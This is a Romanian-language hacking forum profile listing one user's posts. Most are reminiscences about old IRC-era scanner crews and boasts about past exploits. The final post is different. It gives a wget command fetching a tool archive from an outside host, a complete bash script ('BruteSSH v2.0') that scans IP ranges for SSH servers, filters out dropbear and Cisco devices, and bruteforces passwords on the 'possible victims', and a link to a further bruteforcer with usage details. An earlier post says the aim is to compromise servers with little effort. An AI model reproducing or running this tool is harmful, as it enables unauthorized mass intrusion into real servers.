Jump to content

mofomf

Members
  • Posts

    9
  • Joined

  • Last visited

About mofomf

  • Birthday 06/04/1980

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

mofomf's Achievements

Newbie

Newbie (1/14)

  • Conversation Starter Rare
  • First Post Rare
  • Week One Done Rare
  • One Month Later Rare
  • One Year In Rare

Recent Badges

10

Reputation

  1. mofomf

    UstupidMF

    Vreau sa dau de Xbuffer in special
  2. mofomf

    UstupidMF

    Haideti sa facem putina galagie sa reunim brigada veche. Vreau sa stiu despre toti din trecut, de pe mirc, ce-i ce au dat startul, toti acei script kiddies!
  3. mofomf

    UstupidMF

    Abia in 2021 s-a trecut de la bruteforceul compilat de mine in urma cu o vesnicie la un nou tip de bruteforcessh... ce au facut toti acesti mari "hackeri + coderi" atatia ani ? Ca si relevanta istorica, adevarul este urmatorul. Haita team formata din DrBios si Xbuffer au facut acest bruteforcer pe care eu l-am invetat si am fost chemat sa-l compilez, ceea ce voi n-ati reusit mai bine de 10 ani. Tot haita team a inventat cgiscanul pe care l-au folosit toti si fara de care, pula evolutie in acest domeniu. Invechit cum sunt, am testat si tot bomba sunt, sunt mai multe buguri acum ca atunci Poate revin la 60 de ani, sa distrug tot ce a-ti facut pana atunci.
  4. mofomf

    UstupidMF

    Care mai exista din brigada veche si cati dintre voi n-ati ajuns sclavii mariilor corporatii ? Cati dintre voi puteti spune c-ati reusit in viata ? Aceasta este judecata de apoi, acelor mari si multi hackeri .. doresc pe aceasta cale sa ma exprim ca un parlamentar si sa iesiti din vizuina toti pe care iam invatat sa mineze crypto in 2010 si cati dintre aceastia sunt milionari ? Banuiesc ca foarte multi...
  5. Moama, a-ti distrus o legenda prin a acorda accesul la nick-ul UstupidMF pentru a-l denigra in halul asta Dupa atatia ani de zile, ce kkt faceti ? Exista vreunu in viata fara a lucra la vreo corporatie de cacat, fara a fi sclavul cuiva ? Haideti sa deschidem un nou topic pentru a ne da in stamba, chiar sunt curios de cati sclavi am lasat in urma!
  6. Am postat asta ca ma tot stresa dropbear si cisco, dar degeaba, nu se mai prinde nimic cu el, sau ce prinzi sunt balarii... Voiam sa gasesc ceva repede sa prind niste servere decente fara sa depun prea mult efort.
  7. Noroc. N-am patit nimic .. m-am lasat de hacking si ma apucasem de bani Acum am intrat si eu dupa o pauza de cativa ani si tot caut tooluri, am gasit tot script-uri facute de bios si xbuffer, nimic nou
  8. Am fost .. acum sunt batran si clueless
  9. wget prg.at.ua/scan/prgssh2018.tgz Modificati go si gob cu #!/bin/bash # BruteSSH v2.0 - 2018 ####################################################### # Author: PRG @ #old Team UnderNet ####################################################### # _________ ______ # | | | ____\ # | () | () | | # | __| __| | ___. # | | | \ | ||_. | # | | | | \| |__| | # |_| |_|\_|______| # __________ ____________________ ___ __ __. # / \ / | \__. .__/| ___|/ \| | | | # | _ | | | |\ | | | | |__ | () | \/ | # | <_> | | | | | | | | | .__|| __ | . . | # | | |___ | |/ | | | | |___| || | |\/| | # \_____/______)|____/ |_| |_____|__||_|_| |_| # ####################################################### ALB='\033[1;37m' VERDE='\033[01;32m' NORM='\033[00;00m' ############ CONFIG ############ uidThreads=50 userThreads=50 port=22 psSpeed=8 passfile=pass.lst ipslist=scan.log ############################## rm -rf bios.txt scan.log if [[ $UID == 0 || $EUID == 0 ]]; then echo -e "${ALB}[${VERDE}system${ALB}] ${VERDE}uid0 ${ALB}detected " sleep 3 echo -e "${ALB}SCANNING CLASS ${VERDE}$1" sleep 3 ./ps $port -a $1 -s $psSpeed cat bios.txt |sort | uniq > scan.log cat scan.log | pnscan 22 > faradrop cat faradrop | grep -v dropbear | grep -v HEX | grep -v Cisco | grep -v ROSSSH| grep SSH > faradrop2 cat faradrop2 | awk '{print $1}' > scan.log oopsnr2=`grep -c . scan.log` echo -e "${ALB}[${VERDE}system${ALB}] ${ALB}Found${VERDE} $oopsnr2 ${ALB}possible victims " sleep 3 ./prg -f $ipslist -t $uidThreads -pass $passfile -p $port else echo -e "${ALB}[${VERDE}system${ALB}] ${VERDE}user ${ALB}detected " sleep 3 ./prg -b $1 -t $userThreads -pass $passfile -p $port fi sleep 3 cat vuln.txt |grep -v "duplicate" >> vuln1.txt; rm -rf vuln.txt ------------------------------------ instalati https://github.com/ptrrkssn/pnscan ----------------------------------- puteti adauga si alt tip de ssh bruteforcer https://www.sendspace.com/file/ks15fb usage: ./chattr.1 <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port> ---------------------------------
×
×
  • Create New...